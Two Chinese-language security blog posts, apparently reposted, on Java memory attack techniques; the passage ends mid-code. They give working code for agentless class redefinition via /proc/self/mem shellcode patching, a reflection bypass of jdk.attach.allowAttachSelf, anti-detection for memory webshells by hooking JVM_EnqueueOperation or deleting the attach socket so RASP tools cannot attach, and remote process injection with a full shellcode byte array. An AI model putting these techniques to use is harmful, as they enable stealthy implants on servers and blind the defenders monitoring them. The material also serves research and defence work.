_JNI_IMPORT_OR_EXPORT_ jint JNICALL JNI_GetCreatedJavaVMs(JavaVM **, jsize, jsize *);
该方法由libjvm.so中导出，即使so经过strip，符号也一定是存在的。因此我们可以通过此API获得JavaVM对象，通过JavaVM对象就能获得jvmtiEnv指针。
伪造JPLISAgent实例
JPLISAgent结构中虽然有很多成员，但分析Instrumentation对象中我们需要使用的redefineClasses等方法的native实现
public class InstrumentationImpl implements Instrumentation {    private native void    redefineClasses0(long nativeAgent, ClassDefinition[]  definitions)        throws  ClassNotFoundException;
    @SuppressWarnings("rawtypes")    private native Class[]    getAllLoadedClasses0(long nativeAgent);
    ...}
它们都只是从agent中获取jvmtiEnv指针，之后都没有再使用agent的其他成员
jobjectArraycommonGetClassList( JNIEnv *            jnienv,                    JPLISAgent *        agent,                    jobject             classLoader,                    ClassListFetcher    fetcher) {    jvmtiEnv *      jvmtienv        = jvmti(agent);
...voidredefineClasses(JNIEnv * jnienv, JPLISAgent * agent, jobjectArray classDefinitions) {    jvmtiEnv*   jvmtienv                        = jvmti(agent);
...
那么我们只需要使用unsafe方法，申请一段内存，并在对应的偏移上放置jvmtiEnv指针值，就完成了JPLISAgent实例的构造。关键问题还是要解决获取jvmtiEnv指针。
如何在Java层调用native接口？
获取jvmtienv指针，可以采用暴力搜索内存的方式，但是这种方法很难做到通用。jvmtienv实例中有固定不变的4字节魔术字0x71EE，this指针就是jvmtiEnv指针。
//JVMTI_MAGIC    = 0x71EE,bool __fastcall JvmtiEnvBase::is_valid(JvmtiEnvBase *this){  return *((_DWORD *)this + 2) == 0x71EE;}
稳定的办法就是上文分析的，通过JavaVM对象来获取。
struct JavaVM_ {    const struct JNIInvokeInterface_ *functions;#ifdef __cplusplus
    jint DestroyJavaVM() {        return functions->DestroyJavaVM(this);    }    jint AttachCurrentThread(void **penv, void *args) {        return functions->AttachCurrentThread(this, penv, args);    }    jint DetachCurrentThread() {        return functions->DetachCurrentThread(this);    }
    jint GetEnv(void **penv, jint version) {        return functions->GetEnv(this, penv, version);    }    jint AttachCurrentThreadAsDaemon(void **penv, void *args) {        return functions->AttachCurrentThreadAsDaemon(this, penv, args);    }#endif};
JavaVM对象其实也只是一个函数指针数组，不存在固定不变的魔术字。如果要通过JNI_GetCreatedJavaVMs方法获得，在Java层怎么调用它呢？
Java层想要调用native方法，常规做法是通过JNI，这种办法仍然需要提供一个so文件，然后通过dlopen的方式加载，这显然与本文初衷不符。不通过JNI能不能做到？至少在Linux是能做到的。
 参考如下代码
#include #include #include 
/* Write @len bytes at @ptr to @addr in this address space using * /proc/self/mem. */void memwrite(void *addr, char *ptr, size_t len) {  std::ofstream ff("/proc/self/mem");  ff.seekp(reinterpret_cast<size_t>(addr));  ff.write(ptr, len);  ff.flush();}
int main(int argc, char **argv) {  // Map an unwritable page. (read-only)  auto mymap =      (int *)mmap(NULL, 0x9000,                  PROT_READ, // <<<<<<<<<<<<<<<<<<<<< READ ONLY <<<<<<<<                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (mymap == MAP_FAILED) {    std::cout << "FAILED\n";    return 1;  }
  std::cout << "Allocated PROT_READ only memory: " << mymap << "\n";  getchar();
  // Try to write to the unwritable page.  memwrite(mymap, "\x40\x41\x41\x41", 4);  std::cout << "did mymap[0] = 0x41414140 via proc self mem..";  getchar();  std::cout << "mymap[0] = 0x" << std::hex << mymap[0] << "\n";  getchar();
  // Try to writ to the text segment (executable code) of libc.  auto getchar_ptr = (char *)getchar;  memwrite(getchar_ptr, "\xcc", 1);
  // Run the libc function whose code we modified. If the write worked,  // we will get a SIGTRAP when the 0xcc executes.  getchar();}
编译执行后，得到结果
root@ecs-16:~# ./proc_mem_poc Allocated PROT_READ only memory: 0x7f4390429000
did mymap[0] = 0x41414140 via proc self mem..mymap[0] = 0x41414140
Trace/breakpoint trap (core dumped)
以上代码示例说明，Linux下进程可以通过/proc/self/mem修改自身内存，即使是只读内存也可以修改。示例代码修改了getchar函数的开头为int3，结果真的执行了。
 使用Java代码读写/proc/self/mem是完全没问题的，而Java原生就有很多JNI的native方法，比如libjava.so中的
Java_java_lang_ClassLoader_registerNatives等等很多。
 如果先修改Java_java_lang_ClassLoader_registerNatives的代码为我想要的，然后再主动调用ClassLoader.registerNatives，就实现了native层的任意代码执行。然后再还原代码，一切好像从未发生过！
 那么关键问题就变为：如何获取
Java_java_lang_ClassLoader_registerNatives地址
Java查找ELF导出符号
再次得益于LINUX下的/proc文件系统，我们可以从/proc/self/maps轻易的获取所有已加载ELF对象的基址及文件路径
7fcbb8c0d000-7fcbb9a95000 r-xp 00000000 fc:01 1179725                    /CloudResetPwdUpdateAgent/depend/jre1.8.0_232/lib/amd64/server/libjvm.so7fcbb9a95000-7fcbb9c95000 ---p 00e88000 fc:01 1179725                    /CloudResetPwdUpdateAgent/depend/jre1.8.0_232/lib/amd64/server/libjvm.so7fcbb9c95000-7fcbb9d33000 r--p 00e88000 fc:01 1179725                    /CloudResetPwdUpdateAgent/depend/jre1.8.0_232/lib/amd64/server/libjvm.so7fcbb9d33000-7fcbb9d5c000 rw-p 00f26000 fc:01 1179725                    /CloudResetPwdUpdateAgent/depend/jre1.8.0_232/lib/amd64/server/libjvm.so
那么获取导出符号就变得非常简单，直接打开ELF文件解析得到对应符号地址，然后再加上库基址即可。对于x64 ELF的实例代码如下：
static long find_symbol(String elfpath, String sym, long libbase) throws IOException{    long func_ptr = 0;    RandomAccessFile fin = new RandomAccessFile(elfpath, "r");        byte[] e_ident = new byte[16];    fin.read(e_ident);    short e_type = Short.reverseBytes(fin.readShort());    short e_machine = Short.reverseBytes(fin.readShort());    int e_version = Integer.reverseBytes(fin.readInt());    long e_entry = Long.reverseBytes(fin.readLong());    long e_phoff = Long.reverseBytes(fin.readLong());    long e_shoff = Long.reverseBytes(fin.readLong());    int e_flags = Integer.reverseBytes(fin.readInt());    short e_ehsize = Short.reverseBytes(fin.readShort());    short e_phentsize = Short.reverseBytes(fin.readShort());    short e_phnum = Short.reverseBytes(fin.readShort());    short e_shentsize = Short.reverseBytes(fin.readShort());    short e_shnum = Short.reverseBytes(fin.readShort());    short e_shstrndx = Short.reverseBytes(fin.readShort());                int sh_name = 0;    int sh_type = 0;    long sh_flags = 0;    long sh_addr = 0;    long sh_offset = 0;    long sh_size = 0;    int sh_link = 0;    int sh_info = 0;    long sh_addralign = 0;    long sh_entsize = 0;        for(int i = 0; i < e_shnum; ++i) {        fin.seek(e_shoff + i*64);        sh_name = Integer.reverseBytes(fin.readInt());        sh_type = Integer.reverseBytes(fin.readInt());        sh_flags = Long.reverseBytes(fin.readLong());        sh_addr = Long.reverseBytes(fin.readLong());        sh_offset = Long.reverseBytes(fin.readLong());        sh_size = Long.reverseBytes(fin.readLong());        sh_link = Integer.reverseBytes(fin.readInt());        sh_info = Integer.reverseBytes(fin.readInt());        sh_addralign = Long.reverseBytes(fin.readLong());        sh_entsize = Long.reverseBytes(fin.readLong());        if(sh_type == SHT_DYNSYM) {            break;        }    }        int symtab_shdr_sh_link = sh_link;    long symtab_shdr_sh_size = sh_size;    long symtab_shdr_sh_entsize = sh_entsize;    long symtab_shdr_sh_offset = sh_offset;        fin.seek(e_shoff + symtab_shdr_sh_link * e_shentsize);    sh_name = Integer.reverseBytes(fin.readInt());    sh_type = Integer.reverseBytes(fin.readInt());    sh_flags = Long.reverseBytes(fin.readLong());    sh_addr = Long.reverseBytes(fin.readLong());    sh_offset = Long.reverseBytes(fin.readLong());    sh_size = Long.reverseBytes(fin.readLong());    sh_link = Integer.reverseBytes(fin.readInt());    sh_info = Integer.reverseBytes(fin.readInt());    sh_addralign = Long.reverseBytes(fin.readLong());    sh_entsize = Long.reverseBytes(fin.readLong());        long symstr_shdr_sh_offset = sh_offset;        long cnt = symtab_shdr_sh_entsize > 0 ? symtab_shdr_sh_size/symtab_shdr_sh_entsize : 0;    for(long i = 0; i < cnt; ++i) {        fin.seek(symtab_shdr_sh_offset + symtab_shdr_sh_entsize*i);        int st_name = Integer.reverseBytes(fin.readInt());        byte st_info = fin.readByte();        byte st_other = fin.readByte();        short st_shndx = Short.reverseBytes(fin.readShort());        long st_value = Long.reverseBytes(fin.readLong());        long st_size = Long.reverseBytes(fin.readLong());        if(st_value == 0            || st_name == 0            || (ELF_ST_TYPE(st_info) != STT_FUNC && ELF_ST_TYPE(st_info) != STT_GNU_IFUNC))        {            continue;        }                fin.seek(symstr_shdr_sh_offset + st_name);        String name = "";        byte ch = 0;        while((ch = fin.readByte()) != 0)        {            name += (char)ch;        }                if(sym.equals(name))        {            func_ptr = libbase + st_value;            break;        }    }        fin.close();        return func_ptr;}
最后的步骤
为了能从native层得到返回值到java层，我们需要找一个返回值为long的native方法，把shellcode植入到它的开头。
void * shellcode(){    struct JavaVM_ * vm;    jsize count;    JNI_GetCreatedJavaVMs(&vm, 1, &count);    struct jvmtiEnv_ * _jvmti_env;     vm->functions->GetEnv(vm, (void **)&_jvmti_env, JVMTI_VERSION_1_2);    return _jvmti_env;}
转换为shellcode
movabs  rax, _JNI_GetCreatedJavaVMssub     rsp, 20hxor     rsi, rsiinc     rsilea     rdx, [rsp+4]lea     rdi, [rsp+8]call    raxmov     rdi, [rsp+8]lea     rsi, [rsp+10h]mov     edx, 30010200hmov     rax, [rdi]call    qword ptr [rax+30h]mov     rax, [rsp+10h]add     rsp, 20hret
后来我选择了libjava.so中的Java_java_io_RandomAccessFile_length。使用unsafe申请一段内存，并在偏移8（x64下指针长度为8）的位置上放置jvmtienv指针
long JPLISAgent = unsafe.allocateMemory(0x1000);unsafe.putLong(JPLISAgent + 8, native_jvmtienv);
再通过反射最终得到InstrumentationImpl对象
try {    Class instrument_clazz = Class.forName("sun.instrument.InstrumentationImpl");    Constructor constructor = instrument_clazz.getDeclaredConstructor(long.class, boolean.class, boolean.class);    constructor.setAccessible(true);    Object insn = constructor.newInstance(JPLISAgent, true, false);    Method getAllLoadedClasses = instrument_clazz.getMethod("getAllLoadedClasses");    Class[] clazzes = (Class[]) getAllLoadedClasses.invoke(insn);        for(Class cls : clazzes) {        System.out.println(cls.getName());    }    }catch(Exception e) {    System.out.println("Exception: " + e.getMessage());}
需要注意的是，在Java11中sun.instrument包已不再可引用。这里已经可以获取所有加载的类。
意外
在正确查找得到jvmtienv指针之后，执行redefineClasses会报异常
Java_java_io_RandomAccessFile_length 0x7fb29c485e40JNI_GetCreatedJavaVMs 0x7fb29d52b650native_jvmtienv 7fb2980ef070
Exception: null
使用调试工具跟踪，在函数redefineClasses中会调用
voidredefineClasses(JNIEnv * jnienv, JPLISAgent * agent, jobjectArray classDefinitions) {    jvmtiEnv*   jvmtienv                        = jvmti(agent);    jboolean    errorOccurred                   = JNI_FALSE;    jclass      classDefClass                   = NULL;    jmethodID   getDefinitionClassMethodID      = NULL;    ...    if (!errorOccurred) {                    jvmtiError  errorCode = JVMTI_ERROR_NONE;                    errorCode = (*jvmtienv)->RedefineClasses(jvmtienv, numDefs, classDefs);                    if (errorCode == JVMTI_ERROR_WRONG_PHASE) {                        /* insulate caller from the wrong phase error */                        errorCode = JVMTI_ERROR_NONE;                    } else {                        errorOccurred = (errorCode != JVMTI_ERROR_NONE);                        if ( errorOccurred ) {                            createAndThrowThrowableFromJVMTIErrorCode(jnienv, errorCode);                        }                    }                }    ...}
这个(*jvmtienv)->RedefineClasses调用，暂时没找到源码，在IDA中逆向的结果如下
__int64 __fastcall jvmti_RedefineClasses(JvmtiEnvBase *this, JavaThread *a2, __int64 a3){  int v4; // er15  unsigned int v5; // er12  void *v7; // rax  unsigned __int64 v8; // r14  unsigned __int64 v9; // rsi  __int64 v10; // rbx  _QWORD *v11; // rax  _QWORD *v12; // r13  signed __int32 v13; // [rsp+0h] [rbp-60h] BYREF  CautiouslyPreserveExceptionMark *v14; // [rsp+8h] [rbp-58h]  char v15[40]; // [rsp+10h] [rbp-50h] BYREF
  v4 = (int)a2;  v5 = 112;  if ( JvmtiEnvBase::_phase == 4 )  {    v7 = pthread_getspecific(ThreadLocalStorage::_thread_index);    v8 = (unsigned __int64)v7;    if ( v7 && (*(unsigned __int8 (__fastcall **)(void *))(*(_QWORD *)v7 + 40LL))(v7) )    {      *(_DWORD *)(v8 + 624) = 5;      if ( os::_processor_count != 1 || AssumeMP )      {        if ( UseMembar )        {          if ( os::_processor_count != 1 || AssumeMP )            _InterlockedAdd(&v13, 0);        }        else        {          *(_DWORD *)((char *)os::_mem_serialize_page                    + ((unsigned int)(v8 >> 4) & (unsigned int)os::_serialize_page_mask)) = 1;        }      }      if ( SafepointSynchronize::_state || (*(_DWORD *)(v8 + 48) & 0x30000000) != 0 )        JavaThread::check_safepoint_and_suspend_for_native_trans((JavaThread *)v8, a2);      *(_DWORD *)(v8 + 624) = 6;      v9 = v8;      v5 = 116;      v14 = (CautiouslyPreserveExceptionMark *)v15;      CautiouslyPreserveExceptionMark::CautiouslyPreserveExceptionMark(        (CautiouslyPreserveExceptionMark *)v15,        (Thread *)v8);      if ( (unsigned __int8)JvmtiEnvBase::is_valid(this) )      {        v5 = 99;        if ( (*((_BYTE *)this + 361) & 2) != 0 )   <--- 这个位置校验不过，需要令它为2        {          v5 = 103;          if ( v4 >= 0 )          {            v5 = 100;            if ( a3 )            {              v9 = (unsigned int)v4;              v5 = JvmtiEnv::RedefineClasses(this, (unsigned int)v4, a3);            }          }        }    ...}
因此需要用unsafe设置一下
unsafe.putByte(native_jvmtienv + 361, (byte) 2);
测试
修改java.io.RandomAccessFile的getFD方法，插入打印语句
public static void main(String[] args) {    ClassPool pool = ClassPool.getDefault();    CtClass string_clazz = null;    try {        string_clazz = pool.get("java.io.RandomAccessFile");        CtMethod method_getname = string_clazz.getDeclaredMethod("getFD");        method_getname.insertBefore("System.out.println(\"hi, from java instrucment api\");");        string_clazz.writeFile("D:\\1.txt");    } catch (NotFoundException e) {        // TODO Auto-generated catch block        e.printStackTrace();    } catch (CannotCompileException e) {        // TODO Auto-generated catch block        e.printStackTrace();    } catch (IOException e) {        // TODO Auto-generated catch block        e.printStackTrace();    }}
从1.txt文件夹里读取类的字节码
try {    Class instrument_clazz = Class.forName("sun.instrument.InstrumentationImpl");    Constructor constructor = instrument_clazz.getDeclaredConstructor(long.class, boolean.class, boolean.class);    constructor.setAccessible(true);    Object inst = constructor.newInstance(JPLISAgent, true, false);        //修改过的java.io.RandomAccessFile    byte hexData[] = {            ... //太长省略     };        ClassDefinition definition = new ClassDefinition(Class.forName("java.io.RandomAccessFile"), hexData);    Method redefineClazz = instrument_clazz.getMethod("redefineClasses", ClassDefinition[].class);    redefineClazz.invoke(inst, new Object[] {            new ClassDefinition[] {                    definition                    }            });}catch(Exception e) {    System.out.println("Exception: " + e.getMessage());}
fout.getFD();
正确输出结果
Java_java_io_RandomAccessFile_length 0x7fd720689e40JNI_GetCreatedJavaVMs 0x7fd72172f650native_jvmtienv 7fd71c0e71d0
hi, from java instrucment api
完整代码请参考：https://github.com/bigBestWay/ice
结语
要在不提供agent文件的条件下完成Java Instrument，有如下步骤：
解析ELF，得到Java_java_io_RandomAccessFile_length和JNI_GetCreatedJavaVMs
生成利用JNI_GetCreatedJavaVMs获取jvmtienv指针的shellcode
在Java_java_io_RandomAccessFile_length放置shellcode并调用
恢复Java_java_io_RandomAccessFile_length代码
利用unsafe伪造agent实例
利用反射实例化sun.instrument.InstrumentationImpl
使用此对象修改类
参考
rebeyond 《Java内存攻击技术漫谈》
https://mp.weixin.qq.com/s/JIjBjULjFnKDjEhzVAtxhw





阅读原文
跳转微信打开



Java内存攻击技术漫谈
Tue, 17 Aug 2021 20:14:00 +0800

原创 rebeyond 2021-08-17 20:14 


前言Java技术栈漏洞目前业已是web安全领域的主流战场，随着IPS、RASP等防御系统的更新迭代，Java









前言
Java技术栈漏洞目前业已是web安全领域的主流战场，随着IPS、RASP等防御系统的更新迭代，Java攻防交战阵地已经从磁盘升级到了内存里面。在今年7月份上海银针安全沙龙上，我分享了《Java内存攻击技术漫谈》的议题，个人觉得PPT承载的信息比较离散，技术类的内容还是更适合用文章的形式来分享，所以一直想着抽时间写一篇和议题配套的文章，不巧赶上南京的新冠疫情，这篇文章拖了一个多月才有时间写。
allowAttachSelf绕过
Java的instrument是Java内存攻击常用的一种机制，instrument通过attach方法提供了在JVM运行时动态查看、修改Java类的功能，比如通过instrument动态注入内存马。但是在Java9及以后的版本中，默认不允许SelfAttach：
Attach API cannot be used to attach to the current VM by default 
The implementation of Attach API has changed in JDK 9 to disallow attaching to the current VM by default. This change should have no impact on tools that use the Attach API to attach to a running VM. It may impact libraries that misuse this API as a way to get at the java.lang.instrument API. The system property jdk.attach.allowAttachSelf may be set on the command line to mitigate any compatibility with this change.
也就是说，系统提供了一个jdk.attach.allowAttachSelf的VM参数，这个参数默认为false，且必须在Java启动时指定才生效。
编写一个demo尝试attach自身PID，提示Can not attach to current VM，如下：
经过分析attch API的执行流程，定位到如下代码：
由上图可见，attach的时候会创建一个HotSpotVirtualMachine的父类，这个类在初始化的时候会去获取VM的启动参数，并把这个参数保存至HotSpotVirtualMachine的ALLOW_ATTACH_SELF属性中，恰好这个属性是个静态属性，所以我们可以通过反射动态修改这个属性的值。构造如下POC：
    Class cls=Class.forName("sun.tools.attach.HotSpotVirtualMachine");    Field field=cls.getDeclaredField("ALLOW_ATTACH_SELF");    field.setAccessible(true);    Field modifiersField=Field.class.getDeclaredField("modifiers");    modifiersField.setInt(field,field.getModifiers()&~Modifier.FINAL);    field.setBoolean(null,true);
由于ALLOW_ATTACH_SELF字段有final修饰符，所以在修改ALLOW_ATTACH_SELF值的同时，也需要把它的final修饰符给去掉（修改的时候，会有告警产提示，不影响最终效果，可以忽略）。修改后，可以成功attach到自身进程，如下图：
这样，我们就成功绕过了allowAttachSelf的限制。
内存马防检测
随着攻防热度的升级，内存马注入现在已经发展成为一个常用的攻击技术。目前业界的内存马主要分为两大类：
•Agent型
利用instrument机制，在不增加新类和新方法的情况下，对现有类的执行逻辑进行修改。JVM层注入，通用性强。•非Agent型
通过新增一些Java web组件（如Servlet、Filter、Listener、Controller等）来实现拦截请求，从而注入木马代码，对目标容器环境有较强的依赖性，通用性较弱。
由于内存马技术的火热，内存马的检测也如火如荼，针对内存马的检测，目前业界主要有两种方法：
•基于反射的检测方法
该方法是一种轻量级的检测方法，不需要注入Java进程，主要用于检测非Agent型的内存马，由于非Agent型的内存马会在Java层新增多个类和对象，并且会修改一些已有的数组，因此通过反射的方法即可检测，但是这种方法无法检测Agent型内存马。
•基于instrument机制的检测方法
该方法是一种通用的重量级检测方法，需要将检测逻辑通过attach API注入Java进程，理论上可以检测出所有类型的内存马。当然instrument不仅能用于内存马检测，java.lang.instrument是Java 1.5引入的一种可以通过修改字节码对Java程序进行监测的一种机制，这种机制广泛应用于各种Java性能检测框架、程序调试框架，如JProfiler、IntelliJ IDE等，当然近几年比较流行的RASP也是基于此类技术。

既然通过instrument机制能检测到Agent型内存马，那我们怎么样才能避免被检测到呢？答案比较简单，也比较粗暴，那就是把instrument机制破坏掉。这也是在冰蝎3.0中内存马防检测机制的实现原理，检测软件无法attach，自然也就无法检测。
首先，我们先分析一下instrument的工作流程，如下图：
1.检测工具作为Client，根据指定的PID，向目标JVM发起attach请求；2.JVM收到请求后，做一些校验（比如上文提到的jdk.attach.allowAttachSelf的校验），校验通过后，会打开一个IPC通道。3.接下来Client会封装一个名为AttachOperation的C++对象，发送给Server端；4.Server端会把Client发过来的AttachOperation对象放入一个队列；5.Server端另外一个线程会从队列中取出AttachOperation对象并解析，然后执行对应的操作，并把执行结果通过IPC通道返回Client。
由于该套流程的具体实现在不同的操作系统平台上略有差异，因此接下来我分平台来展开。
windows平台
通过分析定位到如下关键代码：
可以看到当var5不等于0的时候，attach会报错，而var5是从var4中读取的，var4是execute的返回值，跟入execute，如下：
可以看到，execute方法又把核心工作交给了方法enqueue，这个方法是一个native方法，如下图： 
继续跟入enqueue方法：
可以看到enqueue中封装了一个DataBlock对象，里面有几个关键参数:
strcpy(data.jvmLib, "jvm");strcpy(data.func1, "JVM_EnqueueOperation");strcpy(data.func2, "_JVM_EnqueueOperation@20");
以上操作都发生在Client侧，接下来我们转到Server侧，定位到如下代码：
这段代码是把Client发过来的对象进行解包，然后解析里面的指令。经常写Windows shellcode的人应该会看到两个特别熟悉的API：GetModuleHandle、GetProcAddress，这是动态定位DLL中导出函数的常用API。这里的操作就是动态从jvm.dll中动态定位名称为JVM_EnqueueOperation和_JVM_EnqueueOperation@20的两个导出函数，这两个函数就是上文流程图中将AttachOperation对象放入队列的执行函数。
到这里我想大家应该知道接下来该怎么做了，那就是inlineHook。我们只要把jvm.dll中的这两个导出函数给NOP掉，不就可以成功把instrument的流程给破坏掉了么？
静态分析结束了，接下来动态调试Server侧，定位到如下位置：
图中RIP所指即为JVM_EnqueueOperation函数的入口，我们只要让RIP执行到这里直接返回即可：
怎么修改呢？当然是用JNI，核心代码如下：
unsigned char buf[]="\xc2\x14\x00"; //32,direct return enqueue functionHINSTANCE hModule = LoadLibrary(L"jvm.dll");//LPVOID dst=GetProcAddress(hModule,"ConnectNamedPipe");LPVOID dst=GetProcAddress(hModule,"_JVM_EnqueueOperation@20");DWORD old;if (VirtualProtectEx(GetCurrentProcess(),dst, 3, PAGE_EXECUTE_READWRITE, &old)){WriteProcessMemory(GetCurrentProcess(), dst, buf, 3, NULL);VirtualProtectEx(GetCurrentProcess(), dst, 3, old, &old);}
/*unsigned char buf[]="\xc3"; //64,direct return enqueue functionHINSTANCE hModule = LoadLibrary(L"jvm.dll");//LPVOID dst=GetProcAddress(hModule,"ConnectNamedPipe");LPVOID dst=GetProcAddress(hModule,"JVM_EnqueueOperation");//printf("ConnectNamedPipe:%p",dst);DWORD old;if (VirtualProtectEx(GetCurrentProcess(),dst, 1, PAGE_EXECUTE_READWRITE, &old)){WriteProcessMemory(GetCurrentProcess(), dst, buf, 1, NULL);VirtualProtectEx(GetCurrentProcess(), dst, 1, old, &old);}*/
注意这里要考虑32位和64位的区别，同时要注意堆栈平衡，否则可能会导致进程crash。到此，我们就实现了Windows平台上的内存马防检测（Anti-Attach）功能，我们尝试用JProfiler连接试一下，可见已经无法attach到目标进程了：
以上即是Windows平台上的内存马防检测功能原理。
Linux平台
在Linux平台，instrument的实现略有不同，通过跟踪整个流程定位到如下代码：
可以看到，在Linux平台上，IPC通信采用的是UNIX Domain Socket，因此想破坏Linux平台下的instrument attach流程还是比较简单的，只要把对应的UNIX Domain Socket文件删掉就可以了。删掉后，我们尝试对目标JVM进行attach，便会提示无法attach：
到此，我们就实现了Linux平台上的内存马防检测（Anti-Attach）功能，当然其他*nix-like的操作系统平台也同样适用于此方法。
最后说一句，内存马防检测，其实可以在上述instrument流程图中的任意一个环节进行破坏，都可以实现Anti-Attach的效果。
Java原生远程进程注入
在Windows平台上，进程代码注入有很多种方法，最经典的方法要属CreateRemoteThread，但是这些方法大都被防护系统盯得死死的，比如我写了如下一个最简单的远程注入shellcode的demo：
往当前进程里植入一个弹计算器的shellcode，编译，运行，然后意料之中出现如下这种情况：
但是经过分析JVM的源码我发现，在Windows平台上，Java在实现instrument的时候，出现了一个比较怪异的操作。
在Linux平台，客户端首先是先和服务端协商一个IPC通道，然后后续的操作都是通过这个通道传递AttachOperation对象来实现，换句话说，这中间传递的都是数据，没有代码。
但是在Windows平台，客户端也是首先和服务端协商了一个IPC通道（用的是命名管道），但是在Java层的enqueue函数中，同时还使用了CreateRemoteThread在服务端启动了一个stub线程，让这个线程去在服务端进程空间里执行enqueue操作：
这个stub执行体pCode是在客户端的native层生成的，生成之后作为thread_func传给服务端。但是，虽然stub是在native生成的，这个stub却又在Java层周转了一圈，最终在Java层以字节数组的方式作为Java层enqueue函数的一个参数传进Native。
这样就形成了一个完美的原生远程进程注入，构造如下POC：
import java.lang.reflect.Method;
public class ThreadMain   {    public static void main(String[] args) throws Exception {        System.loadLibrary("attach");        Class cls=Class.forName("sun.tools.attach.WindowsVirtualMachine");        for (Method m:cls.getDeclaredMethods())        {            if (m.getName().equals("enqueue"))            {                long hProcess=-1;                //hProcess=getHandleByPid(30244);                byte buf[] = new byte[]   //pop calc.exe                        {                                (byte) 0xfc, (byte) 0x48, (byte) 0x83, (byte) 0xe4, (byte) 0xf0, (byte) 0xe8, (byte) 0xc0, (byte) 0x00,                                (byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0x51, (byte) 0x41, (byte) 0x50, (byte) 0x52, (byte) 0x51,                                (byte) 0x56, (byte) 0x48, (byte) 0x31, (byte) 0xd2, (byte) 0x65, (byte) 0x48, (byte) 0x8b, (byte) 0x52,                                (byte) 0x60, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x18, (byte) 0x48, (byte) 0x8b, (byte) 0x52,                                (byte) 0x20, (byte) 0x48, (byte) 0x8b, (byte) 0x72, (byte) 0x50, (byte) 0x48, (byte) 0x0f, (byte) 0xb7,                                (byte) 0x4a, (byte) 0x4a, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,                                (byte) 0xac, (byte) 0x3c, (byte) 0x61, (byte) 0x7c, (byte) 0x02, (byte) 0x2c, (byte) 0x20, (byte) 0x41,                                (byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1, (byte) 0xe2, (byte) 0xed,                                (byte) 0x52, (byte) 0x41, (byte) 0x51, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x20, (byte) 0x8b,                                (byte) 0x42, (byte) 0x3c, (byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x8b, (byte) 0x80, (byte) 0x88,                                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x85, (byte) 0xc0, (byte) 0x74, (byte) 0x67,                                (byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x50, (byte) 0x8b, (byte) 0x48, (byte) 0x18, (byte) 0x44,                                (byte) 0x8b, (byte) 0x40, (byte) 0x20, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0xe3, (byte) 0x56,                                (byte) 0x48, (byte) 0xff, (byte) 0xc9, (byte) 0x41, (byte) 0x8b, (byte) 0x34, (byte) 0x88, (byte) 0x48,                                (byte) 0x01, (byte) 0xd6, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,                                (byte) 0xac, (byte) 0x41, (byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1,                                (byte) 0x38, (byte) 0xe0, (byte) 0x75, (byte) 0xf1, (byte) 0x4c, (byte) 0x03, (byte) 0x4c, (byte) 0x24,                                (byte) 0x08, (byte) 0x45, (byte) 0x39, (byte) 0xd1, (byte) 0x75, (byte) 0xd8, (byte) 0x58, (byte) 0x44,                                (byte) 0x8b, (byte) 0x40, (byte) 0x24, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0x66, (byte) 0x41,                                (byte) 0x8b, (byte) 0x0c, (byte) 0x48, (byte) 0x44, (byte) 0x8b, (byte) 0x40, (byte) 0x1c, (byte) 0x49,                                (byte) 0x01, (byte) 0xd0, (byte) 0x41, (byte) 0x8b, (byte) 0x04, (byte) 0x88, (byte) 0x48, (byte) 0x01,                                (byte) 0xd0, (byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x58, (byte) 0x5e, (byte) 0x59, (byte) 0x5a,                                (byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x59, (byte) 0x41, (byte) 0x5a, (byte) 0x48, (byte) 0x83,                                (byte) 0xec, (byte) 0x20, (byte) 0x41, (byte) 0x52, (byte) 0xff, (byte) 0xe0, (byte) 0x58, (byte) 0x41,                                (byte) 0x59, (byte) 0x5a, (byte) 0x48, (byte) 0x8b, (byte) 0x12, (byte) 0xe9, (byte) 0x57, (byte) 0xff,                                (byte) 0xff, (byte) 0xff, (byte) 0x5d, (byte) 0x48, (byte) 0xba, (byte) 0x01, (byte) 0x00, (byte) 0x00,                                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x8d, (byte) 0x8d,                                (byte) 0x01, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0xba, (byte) 0x31, (byte) 0x8b,                                (byte) 0x6f, (byte) 0x87, (byte) 0xff, (byte) 0xd5, (byte) 0xbb, (byte) 0xf0, (byte) 0xb5, (byte) 0xa2,                                (byte) 0x56, (byte) 0x41, (byte) 0xba, (byte) 0xa6, (byte) 0x95, (byte) 0xbd, (byte) 0x9d, (byte) 0xff,                                (byte) 0xd5, (byte) 0x48, (byte) 0x83, (byte) 0xc4, (byte) 0x28, (byte) 0x3c, (byte) 0x06, (byte) 0x7c,                                (byte) 0x0a, (byte) 0x80, (byte) 0xfb, (byte) 0xe0, (byte) 0x75, (byte) 0x05, (byte) 0xbb, (byte) 0x47,                                (byte) 0x13, (byte) 0x72, (byte) 0x6f, (byte) 0x6a, (byte) 0x00, (byte) 0x59, (byte) 0x41, (byte) 0x89,                                (byte) 0xda, (byte) 0xff, (byte) 0xd5, (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e,                                (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00                        };
                String cmd="load";String pipeName="test";                    m.setAccessible(true);                Object result=m.invoke(cls,new Object[]{hProcess,buf,cmd,pipeName,new Object[]{}});                System.out.println("result:"+result);            }

